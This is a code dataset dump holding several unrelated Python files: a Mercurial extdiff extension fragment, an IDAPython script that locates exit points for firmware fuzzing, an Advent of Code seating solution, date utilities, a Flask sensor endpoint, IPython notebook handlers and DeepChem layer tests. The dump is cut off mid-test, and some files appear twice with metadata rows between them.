('r', 'rev', [],
_('revision'), _('REV')),
('c', 'change', '',
_('change made by revision'), _('REV')),
] + commands.walkopts,
_('hg extdiff [OPT]... [FILE]...')),
}
def uisetup(ui):
for cmd, path in ui.configitems('extdiff'):
if cmd.startswith('cmd.'):
cmd = cmd[4:]
if not path:
path = cmd
diffopts = ui.config('extdiff', 'opts.' + cmd, '')
diffopts = diffopts and [diffopts] or []
elif cmd.startswith('opts.'):
continue
else:
# command = path opts
if path:
diffopts = shlex.split(path)
path = diffopts.pop(0)
else:
path, diffopts = cmd, []
# look for diff arguments in [diff-tools] then [merge-tools]
if diffopts == []:
args = ui.config('diff-tools', cmd+'.diffargs') or \
ui.config('merge-tools', cmd+'.diffargs')
if args:
diffopts = shlex.split(args)
def save(cmd, path, diffopts):
'''use closure to save diff command to use'''
def mydiff(ui, repo, *pats, **opts):
return dodiff(ui, repo, path, diffopts + opts['option'],
pats, opts)
doc = _('''\
use %(path)s to diff repository (or selected files)
Show differences between revisions for the specified files, using
the %(path)s program.
When two revision arguments are given, then changes are shown
between those revisions. If only one revision is specified then
that revision is compared to the working directory, and, when no
revisions are specified, the working directory files are compared
to its parent.\
''') % dict(path=util.uirepr(path))
# We must translate the docstring right away since it is
# used as a format string. The string will unfortunately
# be translated again in commands.helpcmd and this will
# fail when the docstring contains non-ASCII characters.
# Decoding the string to a Unicode string here (using the
# right encoding) prevents that.
mydiff.__doc__ = doc.decode(encoding.encoding)
return mydiff
cmdtable[cmd] = (save(cmd, path, diffopts),
cmdtable['extdiff'][1][1:],
_('hg %s [OPTION]... [FILE]...') % cmd)
| pt | 0.143768 | 2.164653 | 2 |
scripts/idapython/idapy_detect_exitats.py | felkal/fuzzware | 106 | 13592 | import idaapi
from idaapi import *
inifinite_loops = [
b"\x00\xbf\xfd\xe7", # loop: nop; b loop
b"\xfe\xe7", # loop: b loop
]
whitelist = [
"Reset_Handler",
"main"
]
def detect_noret_funcs():
exit_locs_name_pairs = []
for func_addr in Functions():
if get_func_flags(func_addr) & idaapi.FUNC_NORET:
name = get_func_name(func_addr)
if name not in whitelist:
print("noret function: '{}' at 0x{:x}".format(name, func_addr))
exit_locs_name_pairs.append((func_addr, name))
return exit_locs_name_pairs
def detect_exit_ats(add_noret_functions=False):
# 0. find BKPTs
exit_locs = []
# 1. find noret functions if requested
if add_noret_functions:
exit_locs += detect_noret_funcs()
cnt = 0
# 2. find infinite loops and BKPT instructions
for segea in Segments():
for funcea in Functions(segea, get_segm_end(segea)):
functionName = get_func_name(funcea)
for (startea, endea) in Chunks(funcea):
for head in Heads(startea, endea):
# print(functionName, ":", "0x%08x"%(head), ":", GetDisasm(head))
for loop_code in inifinite_loops:
if get_bytes(head, len(loop_code)) == loop_code:
print("Found endless loop: 0x{:x} (function {})".format(head, functionName))
exit_locs.append((head, "endless_loop_{:02d}_{}".format(cnt, functionName)))
cnt += 1
if print_insn_mnem(head) == 'BKPT':
print("Found bkpt: 0x{:x} (function {})".format(head, functionName))
exit_locs.append((head, "bkpt_{:02d}_{}".format(cnt, functionName)))
cnt += 1
return exit_locs
def print_exit_ats(add_noret_functions=False):
exit_locs = detect_exit_ats(add_noret_functions=add_noret_functions)
print("exit_at:")
for addr, name in exit_locs:
print(" {}: 0x{:08x}".format(name, addr))
def dump_exit_ats(filename="exit_ats.yml"):
exit_locs = detect_exit_ats()
with open(filename, "w") as f:
f.write("exit_at:\n")
for addr, name in exit_locs:
f.write(" {}: 0x{:08x}\n".format(name, addr))
dump_exit_ats()
| import idaapi
from idaapi import *
inifinite_loops = [
b"\x00\xbf\xfd\xe7", # loop: nop; b loop
b"\xfe\xe7", # loop: b loop
]
whitelist = [
"Reset_Handler",
"main"
]
def detect_noret_funcs():
exit_locs_name_pairs = []
for func_addr in Functions():
if get_func_flags(func_addr) & idaapi.FUNC_NORET:
name = get_func_name(func_addr)
if name not in whitelist:
print("noret function: '{}' at 0x{:x}".format(name, func_addr))
exit_locs_name_pairs.append((func_addr, name))
return exit_locs_name_pairs
def detect_exit_ats(add_noret_functions=False):
# 0. find BKPTs
exit_locs = []
# 1. find noret functions if requested
if add_noret_functions:
exit_locs += detect_noret_funcs()
cnt = 0
# 2. find infinite loops and BKPT instructions
for segea in Segments():
for funcea in Functions(segea, get_segm_end(segea)):
functionName = get_func_name(funcea)
for (startea, endea) in Chunks(funcea):
for head in Heads(startea, endea):
# print(functionName, ":", "0x%08x"%(head), ":", GetDisasm(head))
for loop_code in inifinite_loops:
if get_bytes(head, len(loop_code)) == loop_code:
print("Found endless loop: 0x{:x} (function {})".format(head, functionName))
exit_locs.append((head, "endless_loop_{:02d}_{}".format(cnt, functionName)))
cnt += 1
if print_insn_mnem(head) == 'BKPT':
print("Found bkpt: 0x{:x} (function {})".format(head, functionName))
exit_locs.append((head, "bkpt_{:02d}_{}".format(cnt, functionName)))
cnt += 1
return exit_locs
def print_exit_ats(add_noret_functions=False):
exit_locs = detect_exit_ats(add_noret_functions=add_noret_functions)
print("exit_at:")
for addr, name in exit_locs:
print(" {}: 0x{:08x}".format(name, addr))
def dump_exit_ats(filename="exit_ats.yml"):
exit_locs = detect_exit_ats()
with open(filename, "w") as f:
f.write("exit_at:\n")
for addr, name in exit_locs:
f.write(" {}: 0x{:08x}\n".format(name, addr))
dump_exit_ats()
| en | 0.094802 | 2.390391 | 2 |
2020/src/day11.py | pantaryl/adventofcode | 2 | 13593 | <reponame>pantaryl/adventofcode
from collections import defaultdict
from helpers import memoize
from copy import deepcopy
with open("../input/day11.txt", 'r') as inputFile:
data = [x.rstrip() for x in inputFile.readlines()]
#data = [int(x) for x in data]
map = {}
yMax = len(data)
xMax = len(data[0])
for y in range(yMax):
line = data[y]
for x in range(xMax):
map[(x, y)] = line[x]
def anyAdjacentOccupied(x, y, oldMap) -> bool:
for xVals in [-1, 0, 1]:
for yVals in [-1, 0, 1]:
if xVals == 0 and yVals == 0: continue
if (xVals+x, yVals+y) in oldMap and oldMap[(xVals+x, yVals+y)] == "#":
return True
return False
def alsoOccupied(x, y, oldMap) -> bool:
count = 0
for xVals in [-1, 0, 1]:
for yVals in [-1, 0, 1]:
if xVals == 0 and yVals == 0: continue
if (xVals+x, yVals+y) in oldMap and oldMap[(xVals+x, yVals+y)] == "#":
count += 1
return count >= 4
def printMap(map):
for y in range(yMax):
for x in range(xMax):
print(map[(x, y)], end='')
print()
# Part 1
oldMap = deepcopy(map)
for i in range(5000):
changed = False
newMap = deepcopy(oldMap)
for x in range(xMax):
for y in range(yMax):
if oldMap[(x, y)] == "L" and anyAdjacentOccupied(x, y, oldMap) is False:
newMap[(x, y)] = "#"
changed = True
elif oldMap[(x, y)] == "#" and alsoOccupied(x, y, oldMap):
newMap[(x, y)] = "L"
changed = True
if changed is False:
occupied = 0
for _, value in newMap.items():
occupied += 1 if value == "#" else 0
print(occupied)
break
else:
oldMap = newMap
#printMap(oldMap)
#print()
#print()
# Part 2
def anyAdjacentOccupied2(x, y, oldMap) -> bool:
slopes = [(-1, -1), (-1, 0), (-1, 1),
(0, -1), (0, 1),
(1, -1), (1, 0), (1, 1)]
for slope in slopes:
currentXY = (x + slope[0], y + slope[1])
while currentXY in oldMap:
if oldMap[currentXY] == "L":
break
elif oldMap[currentXY] == "#":
return True
currentXY = (currentXY[0] + slope[0], currentXY[1] + slope[1])
return False
def alsoOccupied2(x, y, oldMap) -> bool:
count = 0
slopes = [(-1, -1), (-1, 0), (-1, 1),
(0, -1), (0, 1),
(1, -1), (1, 0), (1, 1)]
for slope in slopes:
currentXY = (x + slope[0], y + slope[1])
while currentXY in oldMap:
if oldMap[currentXY] == "L":
break
elif oldMap[currentXY] == "#":
count += 1
break
currentXY = (currentXY[0] + slope[0], currentXY[1] + slope[1])
return count >= 5
oldMap = deepcopy(map)
for i in range(500000):
changed = False
newMap = deepcopy(oldMap)
for x in range(xMax):
for y in range(yMax):
if oldMap[(x, y)] == "L" and anyAdjacentOccupied2(x, y, oldMap) is False:
newMap[(x, y)] = "#"
changed = True
elif oldMap[(x, y)] == "#" and alsoOccupied2(x, y, oldMap):
newMap[(x, y)] = "L"
changed = True
if changed is False:
occupied = 0
for _, value in newMap.items():
occupied += 1 if value == "#" else 0
print(occupied)
break
else:
oldMap = newMap
#printMap(oldMap)
#print()
#print()
#input() | from collections import defaultdict
from helpers import memoize
from copy import deepcopy
with open("../input/day11.txt", 'r') as inputFile:
data = [x.rstrip() for x in inputFile.readlines()]
#data = [int(x) for x in data]
map = {}
yMax = len(data)
xMax = len(data[0])
for y in range(yMax):
line = data[y]
for x in range(xMax):
map[(x, y)] = line[x]
def anyAdjacentOccupied(x, y, oldMap) -> bool:
for xVals in [-1, 0, 1]:
for yVals in [-1, 0, 1]:
if xVals == 0 and yVals == 0: continue
if (xVals+x, yVals+y) in oldMap and oldMap[(xVals+x, yVals+y)] == "#":
return True
return False
def alsoOccupied(x, y, oldMap) -> bool:
count = 0
for xVals in [-1, 0, 1]:
for yVals in [-1, 0, 1]:
if xVals == 0 and yVals == 0: continue
if (xVals+x, yVals+y) in oldMap and oldMap[(xVals+x, yVals+y)] == "#":
count += 1
return count >= 4
def printMap(map):
for y in range(yMax):
for x in range(xMax):
print(map[(x, y)], end='')
print()
# Part 1
oldMap = deepcopy(map)
for i in range(5000):
changed = False
newMap = deepcopy(oldMap)
for x in range(xMax):
for y in range(yMax):
if oldMap[(x, y)] == "L" and anyAdjacentOccupied(x, y, oldMap) is False:
newMap[(x, y)] = "#"
changed = True
elif oldMap[(x, y)] == "#" and alsoOccupied(x, y, oldMap):
newMap[(x, y)] = "L"
changed = True
if changed is False:
occupied = 0
for _, value in newMap.items():
occupied += 1 if value == "#" else 0
print(occupied)
break
else:
oldMap = newMap
#printMap(oldMap)
#print()
#print()
# Part 2
def anyAdjacentOccupied2(x, y, oldMap) -> bool:
slopes = [(-1, -1), (-1, 0), (-1, 1),
(0, -1), (0, 1),
(1, -1), (1, 0), (1, 1)]
for slope in slopes:
currentXY = (x + slope[0], y + slope[1])
while currentXY in oldMap:
if oldMap[currentXY] == "L":
break
elif oldMap[currentXY] == "#":
return True
currentXY = (currentXY[0] + slope[0], currentXY[1] + slope[1])
return False
def alsoOccupied2(x, y, oldMap) -> bool:
count = 0
slopes = [(-1, -1), (-1, 0), (-1, 1),
(0, -1), (0, 1),
(1, -1), (1, 0), (1, 1)]
for slope in slopes:
currentXY = (x + slope[0], y + slope[1])
while currentXY in oldMap:
if oldMap[currentXY] == "L":
break
elif oldMap[currentXY] == "#":
count += 1
break
currentXY = (currentXY[0] + slope[0], currentXY[1] + slope[1])
return count >= 5
oldMap = deepcopy(map)
for i in range(500000):
changed = False
newMap = deepcopy(oldMap)
for x in range(xMax):
for y in range(yMax):
if oldMap[(x, y)] == "L" and anyAdjacentOccupied2(x, y, oldMap) is False:
newMap[(x, y)] = "#"
changed = True
elif oldMap[(x, y)] == "#" and alsoOccupied2(x, y, oldMap):
newMap[(x, y)] = "L"
changed = True
if changed is False:
occupied = 0
for _, value in newMap.items():
occupied += 1 if value == "#" else 0
print(occupied)
break
else:
oldMap = newMap
#printMap(oldMap)
#print()
#print()
#input() | en | 0.343801 | 3.152649 | 3 |
jaqs/util/dtutil.py | WestXu/JAQS | 602 | 13594 | # encoding: utf-8
import datetime
import numpy as np
import pandas as pd
def get_next_period_day(current, period, n=1, extra_offset=0):
"""
Get the n'th day in next period from current day.
Parameters
----------
current : int
Current date in format "%Y%m%d".
period : str
Interval between current and next. {'day', 'week', 'month'}
n : int
n times period.
extra_offset : int
n'th business day after next period.
Returns
-------
nxt : int
"""
current_dt = convert_int_to_datetime(current)
if period == 'day':
offset = pd.tseries.offsets.BDay() # move to next business day
# offset = offsets.Day
elif period == 'week':
offset = pd.tseries.offsets.Week(weekday=0) # move to next Monday
elif period == 'month':
offset = pd.tseries.offsets.BMonthBegin() # move to first business day of next month
# offset = offsets.MonthBegin
else:
raise NotImplementedError("Frequency as {} not support".format(period))
offset = offset * n
next_dt = current_dt + offset
if extra_offset:
next_dt = next_dt + extra_offset * pd.tseries.offsets.BDay()
nxt = convert_datetime_to_int(next_dt)
return nxt
def convert_int_to_datetime(dt):
"""Convert int date (%Y%m%d) to datetime.datetime object."""
if isinstance(dt, pd.Series):
dt = dt.astype(str)
elif isinstance(dt, int):
dt = str(dt)
return pd.to_datetime(dt, format="%Y%m%d")
def convert_datetime_to_int(dt):
f = lambda x: x.year * 10000 + x.month * 100 + x.day
if isinstance(dt, (datetime.datetime, datetime.date)):
dt = pd.Timestamp(dt)
res = f(dt)
elif isinstance(dt, np.datetime64):
dt = pd.Timestamp(dt)
res = f(dt)
else:
dt = pd.Series(dt)
res = dt.apply(f)
return res
def shift(date, n_weeks=0):
"""Shift date backward or forward for n weeks.
Parameters
----------
date : int or datetime
The date to be shifted.
n_weeks : int, optional
Positive for increasing date, negative for decreasing date.
Default 0 (no shift).
Returns
-------
res : int or datetime
"""
delta = pd.Timedelta(weeks=n_weeks)
is_int = isinstance(date, (int, np.integer))
if is_int:
dt = convert_int_to_datetime(date)
else:
dt = date
res = dt + delta
if is_int:
res = convert_datetime_to_int(res)
return res
def combine_date_time(date, time):
return np.int64(date) * 1000000 + np.int64(time)
def split_date_time(dt):
date = dt // 1000000
time = dt % 1000000
return date, time
def date_to_month(ser):
# ser = pd.Series(ser)
res = ser % 10000 // 100
MONTH_MAP = {1: 'Jan',
2: 'Feb',
3: 'Mar',
4: 'Apr',
5: 'May',
6: 'Jun',
7: 'Jul',
8: 'Aug',
9: 'Sep',
10: 'Oct',
11: 'Nov',
12: 'Dec'}
# res = res.replace(MONTH_MAP)
return res
def date_to_year(ser):
return ser // 10000
| # encoding: utf-8
import datetime
import numpy as np
import pandas as pd
def get_next_period_day(current, period, n=1, extra_offset=0):
"""
Get the n'th day in next period from current day.
Parameters
----------
current : int
Current date in format "%Y%m%d".
period : str
Interval between current and next. {'day', 'week', 'month'}
n : int
n times period.
extra_offset : int
n'th business day after next period.
Returns
-------
nxt : int
"""
current_dt = convert_int_to_datetime(current)
if period == 'day':
offset = pd.tseries.offsets.BDay() # move to next business day
# offset = offsets.Day
elif period == 'week':
offset = pd.tseries.offsets.Week(weekday=0) # move to next Monday
elif period == 'month':
offset = pd.tseries.offsets.BMonthBegin() # move to first business day of next month
# offset = offsets.MonthBegin
else:
raise NotImplementedError("Frequency as {} not support".format(period))
offset = offset * n
next_dt = current_dt + offset
if extra_offset:
next_dt = next_dt + extra_offset * pd.tseries.offsets.BDay()
nxt = convert_datetime_to_int(next_dt)
return nxt
def convert_int_to_datetime(dt):
"""Convert int date (%Y%m%d) to datetime.datetime object."""
if isinstance(dt, pd.Series):
dt = dt.astype(str)
elif isinstance(dt, int):
dt = str(dt)
return pd.to_datetime(dt, format="%Y%m%d")
def convert_datetime_to_int(dt):
f = lambda x: x.year * 10000 + x.month * 100 + x.day
if isinstance(dt, (datetime.datetime, datetime.date)):
dt = pd.Timestamp(dt)
res = f(dt)
elif isinstance(dt, np.datetime64):
dt = pd.Timestamp(dt)
res = f(dt)
else:
dt = pd.Series(dt)
res = dt.apply(f)
return res
def shift(date, n_weeks=0):
"""Shift date backward or forward for n weeks.
Parameters
----------
date : int or datetime
The date to be shifted.
n_weeks : int, optional
Positive for increasing date, negative for decreasing date.
Default 0 (no shift).
Returns
-------
res : int or datetime
"""
delta = pd.Timedelta(weeks=n_weeks)
is_int = isinstance(date, (int, np.integer))
if is_int:
dt = convert_int_to_datetime(date)
else:
dt = date
res = dt + delta
if is_int:
res = convert_datetime_to_int(res)
return res
def combine_date_time(date, time):
return np.int64(date) * 1000000 + np.int64(time)
def split_date_time(dt):
date = dt // 1000000
time = dt % 1000000
return date, time
def date_to_month(ser):
# ser = pd.Series(ser)
res = ser % 10000 // 100
MONTH_MAP = {1: 'Jan',
2: 'Feb',
3: 'Mar',
4: 'Apr',
5: 'May',
6: 'Jun',
7: 'Jul',
8: 'Aug',
9: 'Sep',
10: 'Oct',
11: 'Nov',
12: 'Dec'}
# res = res.replace(MONTH_MAP)
return res
def date_to_year(ser):
return ser // 10000
| pt | 0.175261 | 3.345056 | 3 |
api/pub/sensor/ds18b20.py | rtaft/pi-sensor-dashboard | 0 | 13595 | import flask
from flask import request
import flask_restful as restful
from marshmallow import Schema, fields, validate
from api.helpers import success, created
from api.exceptions import NotFound
from sensors.ds18b20 import lookup
class DS18B20Query (restful.Resource):
def __init__(self, *args, **kwargs):
self.sensor_service = kwargs['sensor_service']
def get(self):
available = lookup(self.sensor_service.get_config())
return success(available)
| import flask
from flask import request
import flask_restful as restful
from marshmallow import Schema, fields, validate
from api.helpers import success, created
from api.exceptions import NotFound
from sensors.ds18b20 import lookup
class DS18B20Query (restful.Resource):
def __init__(self, *args, **kwargs):
self.sensor_service = kwargs['sensor_service']
def get(self):
available = lookup(self.sensor_service.get_config())
return success(available)
| none | 1 | 2.385542 | 2 |
accenv/lib/python3.4/site-packages/IPython/html/notebook/handlers.py | adamshamsudeen/clubdin-dj | 0 | 13596 | <filename>accenv/lib/python3.4/site-packages/IPython/html/notebook/handlers.py
"""Tornado handlers for the live notebook view.
Authors:
* <NAME>
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import os
from tornado import web
HTTPError = web.HTTPError
from ..base.handlers import IPythonHandler
from ..utils import url_path_join
#-----------------------------------------------------------------------------
# Handlers
#-----------------------------------------------------------------------------
class NewHandler(IPythonHandler):
@web.authenticated
def get(self):
notebook_id = self.notebook_manager.new_notebook()
self.redirect(url_path_join(self.base_project_url, notebook_id))
class NamedNotebookHandler(IPythonHandler):
@web.authenticated
def get(self, notebook_id):
nbm = self.notebook_manager
if not nbm.notebook_exists(notebook_id):
raise web.HTTPError(404, 'Notebook does not exist: %s' % notebook_id)
self.write(self.render_template('notebook.html',
project=self.project,
notebook_id=notebook_id,
kill_kernel=False,
mathjax_url=self.mathjax_url,
)
)
class NotebookRedirectHandler(IPythonHandler):
@web.authenticated
def get(self, notebook_name):
# strip trailing .ipynb:
notebook_name = os.path.splitext(notebook_name)[0]
notebook_id = self.notebook_manager.rev_mapping.get(notebook_name, '')
if notebook_id:
url = url_path_join(self.settings.get('base_project_url', '/'), notebook_id)
return self.redirect(url)
else:
raise HTTPError(404)
class NotebookCopyHandler(IPythonHandler):
@web.authenticated
def get(self, notebook_id):
notebook_id = self.notebook_manager.copy_notebook(notebook_id)
self.redirect(url_path_join(self.base_project_url, notebook_id))
#-----------------------------------------------------------------------------
# URL to handler mappings
#-----------------------------------------------------------------------------
_notebook_id_regex = r"(?P<notebook_id>\w+-\w+-\w+-\w+-\w+)"
_notebook_name_regex = r"(?P<notebook_name>.+\.ipynb)"
default_handlers = [
(r"/new", NewHandler),
(r"/%s" % _notebook_id_regex, NamedNotebookHandler),
(r"/%s" % _notebook_name_regex, NotebookRedirectHandler),
(r"/%s/copy" % _notebook_id_regex, NotebookCopyHandler),
]
| <filename>accenv/lib/python3.4/site-packages/IPython/html/notebook/handlers.py
"""Tornado handlers for the live notebook view.
Authors:
* <NAME>
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import os
from tornado import web
HTTPError = web.HTTPError
from ..base.handlers import IPythonHandler
from ..utils import url_path_join
#-----------------------------------------------------------------------------
# Handlers
#-----------------------------------------------------------------------------
class NewHandler(IPythonHandler):
@web.authenticated
def get(self):
notebook_id = self.notebook_manager.new_notebook()
self.redirect(url_path_join(self.base_project_url, notebook_id))
class NamedNotebookHandler(IPythonHandler):
@web.authenticated
def get(self, notebook_id):
nbm = self.notebook_manager
if not nbm.notebook_exists(notebook_id):
raise web.HTTPError(404, 'Notebook does not exist: %s' % notebook_id)
self.write(self.render_template('notebook.html',
project=self.project,
notebook_id=notebook_id,
kill_kernel=False,
mathjax_url=self.mathjax_url,
)
)
class NotebookRedirectHandler(IPythonHandler):
@web.authenticated
def get(self, notebook_name):
# strip trailing .ipynb:
notebook_name = os.path.splitext(notebook_name)[0]
notebook_id = self.notebook_manager.rev_mapping.get(notebook_name, '')
if notebook_id:
url = url_path_join(self.settings.get('base_project_url', '/'), notebook_id)
return self.redirect(url)
else:
raise HTTPError(404)
class NotebookCopyHandler(IPythonHandler):
@web.authenticated
def get(self, notebook_id):
notebook_id = self.notebook_manager.copy_notebook(notebook_id)
self.redirect(url_path_join(self.base_project_url, notebook_id))
#-----------------------------------------------------------------------------
# URL to handler mappings
#-----------------------------------------------------------------------------
_notebook_id_regex = r"(?P<notebook_id>\w+-\w+-\w+-\w+-\w+)"
_notebook_name_regex = r"(?P<notebook_name>.+\.ipynb)"
default_handlers = [
(r"/new", NewHandler),
(r"/%s" % _notebook_id_regex, NamedNotebookHandler),
(r"/%s" % _notebook_name_regex, NotebookRedirectHandler),
(r"/%s/copy" % _notebook_id_regex, NotebookCopyHandler),
]
| it | 0.490215 | 1.583061 | 2 |
deepchem/models/tensorgraph/tests/test_layers_eager.py | avimanyu786/deepchem | 0 | 13597 | import deepchem as dc
import numpy as np
import tensorflow as tf
import deepchem.models.tensorgraph.layers as layers
from tensorflow.python.eager import context
from tensorflow.python.framework import test_util
class TestLayersEager(test_util.TensorFlowTestCase):
"""
Test that layers function in eager mode.
"""
def test_conv_1d(self):
"""Test invoking Conv1D in eager mode."""
with context.eager_mode():
width = 5
in_channels = 2
filters = 3
kernel_size = 2
batch_size = 10
input = np.random.rand(batch_size, width, in_channels).astype(np.float32)
layer = layers.Conv1D(filters, kernel_size)
result = layer(input)
self.assertEqual(result.shape[0], batch_size)
self.assertEqual(result.shape[2], filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv1D(filters, kernel_size)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_dense(self):
"""Test invoking Dense in eager mode."""
with context.eager_mode():
in_dim = 2
out_dim = 3
batch_size = 10
input = np.random.rand(batch_size, in_dim).astype(np.float32)
layer = layers.Dense(out_dim)
result = layer(input)
assert result.shape == (batch_size, out_dim)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Dense(out_dim)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_highway(self):
"""Test invoking Highway in eager mode."""
with context.eager_mode():
width = 5
batch_size = 10
input = np.random.rand(batch_size, width).astype(np.float32)
layer = layers.Highway()
result = layer(input)
assert result.shape == (batch_size, width)
assert len(layer.trainable_variables) == 4
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Highway()
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_flatten(self):
"""Test invoking Flatten in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10, 4).astype(np.float32)
result = layers.Flatten()(input)
assert result.shape == (5, 40)
def test_reshape(self):
"""Test invoking Reshape in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10, 4).astype(np.float32)
result = layers.Reshape((100, 2))(input)
assert result.shape == (100, 2)
def test_cast(self):
"""Test invoking Cast in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 3)
result = layers.Cast(dtype=tf.float32)(input)
assert result.dtype == tf.float32
def test_squeeze(self):
"""Test invoking Squeeze in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 1, 4).astype(np.float32)
result = layers.Squeeze()(input)
assert result.shape == (5, 4)
def test_transpose(self):
"""Test invoking Transpose in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10, 4).astype(np.float32)
result = layers.Transpose((1, 2, 0))(input)
assert result.shape == (10, 4, 5)
def test_combine_mean_std(self):
"""Test invoking CombineMeanStd in eager mode."""
with context.eager_mode():
mean = np.random.rand(5, 3).astype(np.float32)
std = np.random.rand(5, 3).astype(np.float32)
layer = layers.CombineMeanStd(training_only=True, noise_epsilon=0.01)
result1 = layer(mean, std, training=False)
assert np.array_equal(result1, mean) # No noise in test mode
result2 = layer(mean, std, training=True)
assert not np.array_equal(result2, mean)
assert np.allclose(result2, mean, atol=0.1)
def test_repeat(self):
"""Test invoking Repeat in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 4).astype(np.float32)
result = layers.Repeat(3)(input)
assert result.shape == (5, 3, 4)
assert np.array_equal(result[:, 0, :], result[:, 1, :])
def test_gather(self):
"""Test invoking Gather in eager mode."""
with context.eager_mode():
input = np.random.rand(5).astype(np.float32)
indices = [[1], [3]]
result = layers.Gather()(input, indices)
assert np.array_equal(result, [input[1], input[3]])
def test_gru(self):
"""Test invoking GRU in eager mode."""
with context.eager_mode():
batch_size = 10
n_hidden = 7
in_channels = 4
n_steps = 6
input = np.random.rand(batch_size, n_steps,
in_channels).astype(np.float32)
layer = layers.GRU(n_hidden, batch_size)
result, state = layer(input)
assert result.shape == (batch_size, n_steps, n_hidden)
assert len(layer.trainable_variables) == 3
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.GRU(n_hidden, batch_size)
result2, state2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3, state3 = layer(input)
assert np.allclose(result, result3)
# But if we specify a different starting state, that should produce a
# different result.
result4, state4 = layer(input, initial_state=state3)
assert not np.allclose(result, result4)
def test_lstm(self):
"""Test invoking LSTM in eager mode."""
with context.eager_mode():
batch_size = 10
n_hidden = 7
in_channels = 4
n_steps = 6
input = np.random.rand(batch_size, n_steps,
in_channels).astype(np.float32)
layer = layers.LSTM(n_hidden, batch_size)
result, state = layer(input)
assert result.shape == (batch_size, n_steps, n_hidden)
assert len(layer.trainable_variables) == 3
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.LSTM(n_hidden, batch_size)
result2, state2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3, state3 = layer(input)
assert np.allclose(result, result3)
# But if we specify a different starting state, that should produce a
# different result.
result4, state4 = layer(input, initial_state=state3)
assert not np.allclose(result, result4)
def test_time_series_dense(self):
"""Test invoking TimeSeriesDense in eager mode."""
with context.eager_mode():
in_dim = 2
out_dim = 3
n_steps = 6
batch_size = 10
input = np.random.rand(batch_size, n_steps, in_dim).astype(np.float32)
layer = layers.TimeSeriesDense(out_dim)
result = layer(input)
assert result.shape == (batch_size, n_steps, out_dim)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.TimeSeriesDense(out_dim)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_l1_loss(self):
"""Test invoking L1Loss in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.L1Loss()(input1, input2)
expected = np.mean(np.abs(input1 - input2), axis=1)
assert np.allclose(result, expected)
def test_l2_loss(self):
"""Test invoking L2Loss in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.L2Loss()(input1, input2)
expected = np.mean((input1 - input2)**2, axis=1)
assert np.allclose(result, expected)
def test_softmax(self):
"""Test invoking SoftMax in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.SoftMax()(input)
expected = tf.nn.softmax(input)
assert np.allclose(result, expected)
def test_sigmoid(self):
"""Test invoking Sigmoid in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.Sigmoid()(input)
expected = tf.nn.sigmoid(input)
assert np.allclose(result, expected)
def test_relu(self):
"""Test invoking ReLU in eager mode."""
with context.eager_mode():
input = np.random.normal(size=(5, 10)).astype(np.float32)
result = layers.ReLU()(input)
expected = tf.nn.relu(input)
assert np.allclose(result, expected)
def test_concat(self):
"""Test invoking Concat in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 4).astype(np.float32)
result = layers.Concat()(input1, input2)
assert result.shape == (5, 14)
assert np.array_equal(input1, result[:, :10])
assert np.array_equal(input2, result[:, 10:])
def test_stack(self):
"""Test invoking Stack in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 4).astype(np.float32)
input2 = np.random.rand(5, 4).astype(np.float32)
result = layers.Stack()(input1, input2)
assert result.shape == (5, 2, 4)
assert np.array_equal(input1, result[:, 0, :])
assert np.array_equal(input2, result[:, 1, :])
def test_constant(self):
"""Test invoking Constant in eager mode."""
with context.eager_mode():
value = np.random.rand(5, 4).astype(np.float32)
result = layers.Constant(value)()
assert np.array_equal(result, value)
def test_variable(self):
"""Test invoking Variable in eager mode."""
with context.eager_mode():
value = np.random.rand(5, 4).astype(np.float32)
layer = layers.Variable(value)
result = layer()
assert np.array_equal(result.numpy(), value)
assert len(layer.trainable_variables) == 1
def test_add(self):
"""Test invoking Add in eager mode."""
with context.eager_mode():
result = layers.Add()([1, 2], [3, 4])
assert np.array_equal(result, [4, 6])
def test_multiply(self):
"""Test invoking Multiply in eager mode."""
with context.eager_mode():
result = layers.Multiply()([1, 2], [3, 4])
assert np.array_equal(result, [3, 8])
def test_divide(self):
